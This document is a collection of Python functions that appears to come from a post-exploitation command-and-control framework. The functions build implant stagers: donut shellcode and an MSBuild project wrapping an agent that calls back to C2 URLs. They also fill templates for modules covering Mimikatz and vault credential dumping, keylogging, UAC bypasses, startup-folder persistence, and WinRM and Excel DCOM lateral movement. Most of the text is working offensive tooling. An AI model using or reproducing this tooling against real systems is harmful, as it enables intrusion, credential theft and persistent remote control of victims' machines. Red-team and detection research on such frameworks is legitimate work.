    def payload(self):
        """Render the excel4dcom.boo module source for the selected listener.

        Resolves the configured listener over IPC, registers a new session
        (guid + psk) with the team server, builds donut shellcode for
        naga.exe carrying ``guid;psk;c2_urls`` as its parameter string and
        substitutes SHELLCODE / TARGET / ARCH in the template.

        Returns:
            The filled template, or None (after print_bad) when no listener
            matches the configured name.
        """
        listener_name = self.options['Listener']['Value']
        listener = ipc_server.publish_event(Events.GET_LISTENERS,
                                            (listener_name, ))
        if not listener:
            print_bad(f"Listener '{listener_name}' not found!")
            return None

        # Primary bind address first, then the optional callback URLs;
        # empty entries are dropped before joining.
        primary = f"{listener.name}://{listener['BindIP']}:{listener['Port']}"
        c2_urls = ','.join(
            url for url in (primary, listener['CallBackURls']) if url)

        guid = uuid.uuid4()
        psk = gen_stager_psk()
        ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))

        # donut arch code: 2 for x64, 1 for anything else.
        arch_name = self.options['Architecture']['Value']
        donut_shellcode = donut.create(
            file=get_path_in_package('core/teamserver/data/naga.exe'),
            params=f"{guid};{psk};{c2_urls}",
            arch=2 if arch_name == 'x64' else 1)
        shellcode = shellcode_to_hex_byte_array(donut_shellcode)

        template_path = get_path_in_package(
            'core/teamserver/modules/boo/src/excel4dcom.boo')
        with open(template_path) as module_src:
            src = module_src.read()
        # Placeholders are replaced verbatim, in this order, with no escaping.
        src = src.replace('SHELLCODE', shellcode)
        src = src.replace('TARGET', self.options['Target']['Value'])
        return src.replace('ARCH', arch_name)
    def generate(self, listener):
        """Produce an MSBuild-project stager for *listener*.

        Fills msbuild.xml with a fresh session guid/psk, the listener's
        C2 URL list, a random 5-letter name and naga.exe deflate-compressed
        and base64-encoded.

        Returns:
            ``(guid, psk, template)`` where *template* is the filled XML.
        """
        exe_path = get_path_in_package('core/teamserver/data/naga.exe')
        xml_path = get_path_in_package(
            'core/teamserver/stagers/templates/msbuild.xml')
        with open(exe_path, 'rb') as assembly, open(xml_path) as template_file:
            guid = uuid.uuid4()
            psk = gen_stager_psk()

            # Primary bind address first, then optional callback URLs;
            # empty entries are dropped.
            primary = f"{listener.name}://{listener['BindIP']}:{listener['Port']}"
            c2_urls = ','.join(
                url for url in (primary, listener['CallBackURls']) if url)

            # Each placeholder is substituted verbatim, in this order.
            replacements = (
                ('GUID', str(guid)),
                ('PSK', psk),
                ('URLS', c2_urls),
                ("NAME_GOES_HERE", gen_random_string_no_digits(5)),
                ("BASE64_ENCODED_ASSEMBLY",
                 dotnet_deflate_and_encode(assembly.read())),
            )
            template = template_file.read()
            for placeholder, value in replacements:
                template = template.replace(placeholder, value)
            return guid, psk, template
    def gen_encrypted_stage(self, comms):
        """Build and encrypt the in-memory stage archive.

        The stage is a deflate-compressed zip built in memory holding the
        four Boo.Lang runtime DLLs plus ``Main.boo``, the stager code
        generated from *comms*.  The zip bytes are then passed through
        ``self.crypto.encrypt``.

        Args:
            comms: forwarded unchanged to gen_stager_code.

        Returns:
            Whatever ``self.crypto.encrypt`` returns for the zip bytes.
        """
        stage = gen_stager_code(comms)
        # Entries are written in this fixed order; each DLL is read from the
        # package data directory.
        dll_names = (
            "Boo.Lang.dll",
            "Boo.Lang.Compiler.dll",
            "Boo.Lang.Parser.dll",
            "Boo.Lang.Extensions.dll",
        )
        stage_file = BytesIO()
        with ZipFile(stage_file, 'a', compression=ZIP_DEFLATED,
                     compresslevel=9) as zip_file:
            for dll_name in dll_names:
                dll_path = get_path_in_package(
                    f'core/teamserver/data/{dll_name}')
                with open(dll_path, 'rb') as dll:
                    zip_file.writestr(dll_name, dll.read())
            zip_file.writestr("Main.boo", stage)

        return self.crypto.encrypt(stage_file.getvalue())
 def payload(self):
     """Render mimikatz.boo with the embedded PE blobs and command.

     Three DLLs from the package data directory are deflate-compressed,
     base64-encoded and substituted into the template, followed by the
     configured ``Command`` option (inserted verbatim, no escaping).

     Returns:
         The filled template source.
     """
     data_files = (
         ("COMPRESSED_PE_x86", 'core/teamserver/data/powerkatz_x86.dll'),
         ("COMPRESSED_PE_x64", 'core/teamserver/data/powerkatz_x64.dll'),
         ("MIMI_PE_LOADER", 'core/teamserver/data/mimikatz_peloader.dll'),
     )
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/mimikatz.boo')
     with open(template_path) as module_src:
         src = module_src.read()
     # Placeholders are substituted in this fixed order.
     for placeholder, rel_path in data_files:
         with open(get_path_in_package(rel_path), 'rb') as blob:
             src = src.replace(placeholder,
                               dotnet_deflate_and_encode(blob.read()))
     return src.replace("MIMIKATZ_COMMAND", self.options['Command']['Value'])
    def generate(self, listener):
        """Produce donut shellcode for naga.exe pointed at *listener*.

        Returns:
            ``(guid, psk, shellcode)`` where *shellcode* is the hex-string
            form produced by shellcode_to_hex_string.
        """
        exe_path = get_path_in_package('core/teamserver/data/naga.exe')
        # The handle is only held open here; donut.create is given the path
        # rather than the bytes.
        with open(exe_path, 'rb') as assembly:
            guid = uuid.uuid4()
            psk = gen_stager_psk()

            # Primary bind address first, then optional callback URLs;
            # empty entries are dropped.
            primary = f"{listener.name}://{listener['BindIP']}:{listener['Port']}"
            c2_urls = ','.join(
                url for url in (primary, listener['CallBackURls']) if url)

            # donut arch code: 2 for x64, 1 for x86, 3 for any other value.
            arch_name = self.options['Architecture']['Value']
            if arch_name == 'x64':
                arch = 2
            elif arch_name == 'x86':
                arch = 1
            else:
                arch = 3

            donut_shellcode = donut.create(
                file=exe_path,
                params=f"{guid};{psk};{c2_urls}",
                arch=arch)

            return guid, psk, shellcode_to_hex_string(donut_shellcode)
 def payload(self):
     """Render internalmonologue.boo with the embedded DLL and options.

     The DLL is deflate-compressed and base64-encoded into the template.
     Each ``name=`` placeholder is then replaced by ``name=<value>``
     lower-cased; the Challenge value is additionally wrapped in double
     quotes before lower-casing.

     Returns:
         The filled template source.
     """
     dll_path = get_path_in_package(
         'core/teamserver/data/internalmonologue.dll')
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/internalmonologue.boo')
     with open(dll_path, 'rb') as dll, open(template_path) as module_src:
         src = module_src.read()
         src = src.replace("INTERNAL_MONOLOGUE_DLL",
                           dotnet_deflate_and_encode(dll.read()))
     # (placeholder, option name, quote the value?) in substitution order.
     option_slots = (
         ("impersonate=", 'Impersonate', False),
         ("threads=", 'Threads', False),
         ("downgrade=", 'Downgrade', False),
         ("restore=", 'Restore', False),
         ("challenge=", 'Challenge', True),
         ("verbose=", 'Verbose', False),
     )
     for placeholder, option, quoted in option_slots:
         value = self.options[option]['Value']
         if quoted:
             rendered = f'{placeholder}"{value}"'
         else:
             rendered = f"{placeholder}{value}"
         src = src.replace(placeholder, rendered.lower())
     return src
 def payload(self):
     """Return the unattendedinstallfiles.boo source with no substitutions."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/unattendedinstallfiles.boo')
     with open(template_path, 'r') as module_src:
         return module_src.read()
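    def payload(self):
        """Render execute-assembly.boo around the operator-supplied assembly.

        The ``Assembly`` option is a path (``~`` expanded) to a .NET
        assembly, which is deflate-compressed and base64-encoded into the
        template together with its decompressed length.  The ``Arguments``
        option, when set, is split with ``split`` and rendered as a Boo
        string-array literal; otherwise ASSEMBLY_ARGS becomes an empty
        string.

        Returns:
            The filled template source.

        Raises:
            FileNotFoundError: when the assembly path does not exist.  This
                is a subclass of Exception, so existing ``except Exception``
                handlers keep working.
        """
        template_path = get_path_in_package(
            'core/teamserver/modules/boo/src/execute-assembly.boo')
        with open(template_path) as module_src:
            module = module_src.read()

        assembly_path = os.path.expanduser(self.options['Assembly']['Value'])
        if not os.path.exists(assembly_path):
            raise FileNotFoundError("Assembly not found in specified path")

        with open(assembly_path, 'rb') as assembly:
            assembly_bytes = assembly.read()
        # The length is taken from the bytes actually embedded rather than a
        # separate stat() call, so the two values cannot disagree.
        module = module.replace("B64_ENCODED_COMPRESSED_ASSEMBLY",
                                dotnet_deflate_and_encode(assembly_bytes))
        module = module.replace("DECOMPRESSED_ASSEMBLY_LENGTH",
                                str(len(assembly_bytes)))

        boolang_string_array = ''
        if self.options['Arguments']['Value']:
            # Each argument becomes a Boo backtick-quoted string literal;
            # no escaping is applied to the argument text.
            formatted_arguments = r', '.join(
                fr"`{arg}`"
                for arg in split(self.options['Arguments']['Value']))
            boolang_string_array = f"= array(string, ({formatted_arguments}))"
        module = module.replace("ASSEMBLY_ARGS", boolang_string_array)

        # The stray debug print of the whole generated module (embedded
        # assembly included) was removed; the source is only returned.
        return module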
 def payload(self):
     """Render domainusers.boo from the module options.

     Replacements are applied sequentially in the listed order, each value
     inserted verbatim: string options as-is (Properties lower-cased),
     flag-style options stringified and lower-cased.

     Returns:
         The filled template source.
     """
     opts = self.options
     replacements = (
         ("IDENTITY", opts['Identity']['Value']),
         ("LDAP_FILTER", opts['LDAPFilter']['Value']),
         ("PROPERTIES", opts['Properties']['Value'].lower()),
         ("UAC_FILTER", opts['UACFilter']['Value']),
         ('SPN', str(opts['SPN']['Value']).lower()),
         ('DO_ALLOW_DELEGATION',
          str(opts['DoAllowDelegation']['Value']).lower()),
         ('DISALLOW_DELEGATION',
          str(opts['DisallowDelegation']['Value']).lower()),
         ('ADMINCOUNT', str(opts['AdminCount']['Value']).lower()),
         ('TRUSTED_TO_AUTH', str(opts['TrustedToAuth']['Value']).lower()),
         ('PREAUTH_NOT_REQUIRED',
          str(opts['PreauthNotRequired']['Value']).lower()),
         ('FIND_ONE', str(opts['FindOne']['Value']).lower()),
     )
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/domainusers.boo')
     with open(template_path, 'r') as module_src:
         src = module_src.read()
     # Order matters: a later placeholder occurring inside an earlier
     # inserted value is replaced too.
     for placeholder, value in replacements:
         src = src.replace(placeholder, value)
     return src
 def payload(self):
     """Render domaincomputers.boo from the module options.

     Replacements are applied sequentially in the listed order, each value
     inserted verbatim: string options as-is (Properties lower-cased),
     flag-style options stringified and lower-cased.

     Returns:
         The filled template source.
     """
     opts = self.options
     replacements = (
         ("IDENTITY", opts['Identity']['Value']),
         ("LDAP_FILTER", opts['LDAPFilter']['Value']),
         ("PROPERTIES", opts['Properties']['Value'].lower()),
         ("UAC_FILTER", opts['UACFilter']['Value']),
         ('UNCONSTRAINED', str(opts['Unconstrained']['Value']).lower()),
         ('TRUSTED_TO_AUTH', str(opts['TrustedToAuth']['Value']).lower()),
         ('PRINTERS', str(opts['Printers']['Value']).lower()),
         ('SPN', str(opts['SPN']['Value']).lower()),
         ('OPERATING_SYSTEM', opts['OperatingSystem']['Value']),
         ('SERVICE_PACK', opts['ServicePack']['Value']),
         ('SITE_NAME', opts['SiteName']['Value']),
         ('FIND_ONE', str(opts['FindOne']['Value']).lower()),
     )
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/domaincomputers.boo')
     with open(template_path, 'r') as module_src:
         src = module_src.read()
     # Order matters: a later placeholder occurring inside an earlier
     # inserted value is replaced too.
     for placeholder, value in replacements:
         src = src.replace(placeholder, value)
     return src
 def payload(self):
     """Return the rick-astley.boo source with no substitutions."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/rick-astley.boo')
     with open(template_path, 'r') as module_src:
         return module_src.read()
 def payload(self):
     """Return the alwaysinstallelevated.boo source with no substitutions."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/alwaysinstallelevated.boo')
     with open(template_path, 'r') as module_src:
         return module_src.read()
 def payload(self):
     """Return the mcafeesitelistfiles.boo source with no substitutions."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/mcafeesitelistfiles.boo')
     with open(template_path, 'r') as module_src:
         return module_src.read()
 def payload(self):
     """Render getregistrykey.boo from the module options.

     The hive name is stringified and upper-cased; key and value names are
     inserted verbatim, in that order.

     Returns:
         The filled template source.
     """
     opts = self.options
     replacements = (
         ('REGISTRY_HIVE', str(opts['RegistryHive']['Value']).upper()),
         ('REGISTRY_KEY', opts['RegistryKey']['Value']),
         ('REGISTRY_VALUE', opts['RegistryValue']['Value']),
     )
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/getregistrykey.boo')
     with open(template_path, 'r') as module_src:
         src = module_src.read()
     for placeholder, value in replacements:
         src = src.replace(placeholder, value)
     return src
 def __init__(self, teamserver):
     """Create the module loader bound to *teamserver*.

     Starts with no modules loaded and nothing selected, then hands the
     boo modules directory to the base loader as the only search path.
     """
     self.teamserver = teamserver
     self.modules = []
     self.selected = None
     module_dir = get_path_in_package("core/teamserver/modules/boo/")
     super().__init__(type="module", paths=[module_dir])
 def payload(self):
     """Return the dumpVaultCredentials.boo source with no substitutions."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/dumpVaultCredentials.boo')
     with open(template_path) as module_src:
         return module_src.read()
    def __init__(self, teamserver):
        """Create the listener loader bound to *teamserver*.

        Registers ``self._get_listeners`` as the IPC handler for
        GET_LISTENERS before the base loader is initialised with the
        listeners directory as its only search path.
        """
        self.teamserver = teamserver
        self.listeners = []
        self.selected = None

        ipc_server.attach(Events.GET_LISTENERS, self._get_listeners)
        listener_dir = get_path_in_package("core/teamserver/listeners/")
        super().__init__(type="listener", paths=[listener_dir])
 def payload(self):
     """Return the modifiableservices.boo source with no substitutions."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/modifiableservices.boo')
     with open(template_path, 'r') as module_src:
         return module_src.read()
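def get_comms(comms):
    """Collect the Boo comm-channel sources for the requested channels.

    For every name in *comms* that matches, case-insensitively and after
    stripping whitespace, the stem of a ``.boo`` file in the comms
    directory, the file's contents are appended to a combined source
    buffer and ``NAME()`` (upper-cased) is recorded as the instantiation
    expression.  Names with no matching file are silently skipped.

    Args:
        comms: iterable of channel names.

    Returns:
        ``(instantiations, source)``: the ``", "``-joined ``NAME()``
        expressions and the concatenated channel source text.
    """
    comms_dir = get_path_in_package("core/teamserver/comms/")
    # List the directory once instead of once per channel; filtering on the
    # extension here keeps the inner loop to a single comparison.
    boo_files = [f for f in os.listdir(comms_dir) if f.endswith('.boo')]

    comms_section = StringIO()
    comm_classes = []
    for channel in comms:
        channel_name = channel.strip()
        wanted = channel_name.lower()
        for comm_file in boo_files:
            # Compare against the file stem (name minus ".boo").
            if wanted == comm_file[:-4].lower():
                comm_classes.append(f"{channel_name.upper()}()")
                with open(os.path.join(comms_dir, comm_file)) as channel_code:
                    comms_section.write(channel_code.read())

    return ", ".join(comm_classes), comms_section.getvalue()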
 def payload(self):
     """Render bypassUACfodhelper.boo from the module options.

     BINARY, ARGUMENTS and PATH are replaced in that order by the
     stringified option values, inserted verbatim.

     Returns:
         The filled template source.
     """
     opts = self.options
     replacements = (
         ('BINARY', str(opts['Binary']['Value'])),
         ('ARGUMENTS', str(opts['Arguments']['Value'])),
         ('PATH', str(opts['Path']['Value'])),
     )
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/bypassUACfodhelper.boo')
     with open(template_path, 'r') as module_src:
         src = module_src.read()
     for placeholder, value in replacements:
         src = src.replace(placeholder, value)
     return src
    def generate(self, listener):
        """Return naga.exe as a latin-1 decoded string with a new session.

        *listener* is accepted for interface parity with the other stagers
        but is not used here.

        Returns:
            ``(guid, psk, exe_text)``.
        """
        exe_path = get_path_in_package('core/teamserver/data/naga.exe')
        with open(exe_path, 'rb') as exe:
            raw = exe.read()
        guid = uuid.uuid4()
        psk = gen_stager_psk()
        # latin-1 maps every byte to exactly one code point, so the decode
        # cannot fail and is reversible.
        return guid, psk, raw.decode('latin-1')
    def payload(self):
        """Render winrm.boo with the connection options and a generated stage.

        Both the stager and the listener are resolved over IPC; if either
        is missing, print_bad is called and None is returned.  For the
        powershell stager ``AsFunction`` is forced off before generating.
        The new session (guid, psk) is registered before the template is
        filled; all option values are inserted verbatim.

        Returns:
            The filled template source, or None on an invalid selection.
        """
        stager_name = self.options['Stager']['Value']
        stager = ipc_server.publish_event(Events.GET_STAGERS, (stager_name, ))
        listener = ipc_server.publish_event(
            Events.GET_LISTENERS, (self.options['Listener']['Value'], ))

        if not (stager and listener):
            print_bad('Invalid stager/listener selected')
            return None

        if stager_name == 'powershell':
            stager.options['AsFunction']['Value'] = False

        template_path = get_path_in_package(
            'core/teamserver/modules/boo/src/winrm.boo')
        with open(template_path, 'r') as module_src:
            guid, psk, stage = stager.generate(listener)
            ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))
            src = module_src.read()

        opts = self.options
        replacements = (
            ('TARGET', opts['Host']['Value']),
            ('USERNAME', opts['Username']['Value']),
            ('DOMAIN', opts['Domain']['Value']),
            ('PASSWORD', opts['Password']['Value']),
            ('TRUSTED_HOSTS', str(opts['AddToTrustedHosts']['Value']).lower()),
            ('PAYLOAD', stage),
        )
        for placeholder, value in replacements:
            src = src.replace(placeholder, value)
        return src
 def payload(self):
     """Render ls.boo with the ``Path`` option inserted verbatim for PATH."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/ls.boo')
     with open(template_path, 'r') as module_src:
         src = module_src.read()
     return src.replace('PATH', self.options['Path']['Value'])
 def payload(self):
     """Render rdp.boo, replacing the lower-case token ``status`` with the
     ``RDP_Status`` option value (inserted verbatim)."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/rdp.boo')
     with open(template_path) as module_src:
         src = module_src.read()
     return src.replace('status', self.options['RDP_Status']['Value'])
 def payload(self):
     """Render mouseshaker.boo with the stringified ``Offset`` option for
     OFFSET."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/mouseshaker.boo')
     with open(template_path, 'r') as module_src:
         src = module_src.read()
     return src.replace('OFFSET', str(self.options['Offset']['Value']))
 def payload(self):
     """Render keylogger.boo with the ``Duration`` option inserted verbatim
     for MINUTES (the value is used as-is, not converted to a string)."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/keylogger.boo')
     with open(template_path, 'r') as module_src:
         src = module_src.read()
     return src.replace('MINUTES', self.options['Duration']['Value'])
 def payload(self):
     """Render startupfolderpersistence.boo from the module options.

     COMMAND, ARGUMENTS and FILENAME are replaced verbatim in that order;
     STATUS receives the stringified, lower-cased ``Status`` option.

     Returns:
         The filled template source.
     """
     opts = self.options
     replacements = (
         ('COMMAND', opts['Command']['Value']),
         ('ARGUMENTS', opts['Arguments']['Value']),
         ('FILENAME', opts['FileName']['Value']),
         ('STATUS', str(opts['Status']['Value']).lower()),
     )
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/startupfolderpersistence.boo')
     with open(template_path, 'r') as module_src:
         src = module_src.read()
     for placeholder, value in replacements:
         src = src.replace(placeholder, value)
     return src
 def payload(self):
     """Render bypassUACEventVwr.boo with the stringified ``Command`` option
     for PAYLOAD."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/bypassUACEventVwr.boo')
     with open(template_path, 'r') as module_src:
         src = module_src.read()
     return src.replace('PAYLOAD', str(self.options['Command']['Value']))
 def payload(self):
     """Render impersonateprocess.boo with the ``ProcessID`` option inserted
     verbatim for PROCESS_ID (no string conversion is applied)."""
     template_path = get_path_in_package(
         'core/teamserver/modules/boo/src/impersonateprocess.boo')
     with open(template_path, 'r') as module_src:
         src = module_src.read()
     return src.replace('PROCESS_ID', self.options['ProcessID']['Value'])
    def __init__(self, teamserver):
        """Create the stager loader bound to *teamserver*.

        Registers ``self._get_stagers`` as the IPC handler for GET_STAGERS
        before the base loader is initialised with the stagers directory
        as its only search path.
        """
        self.teamserver = teamserver
        self.selected = None

        ipc_server.attach(Events.GET_STAGERS, self._get_stagers)
        stager_dir = get_path_in_package("core/teamserver/stagers/")
        super().__init__(type="stager", paths=[stager_dir])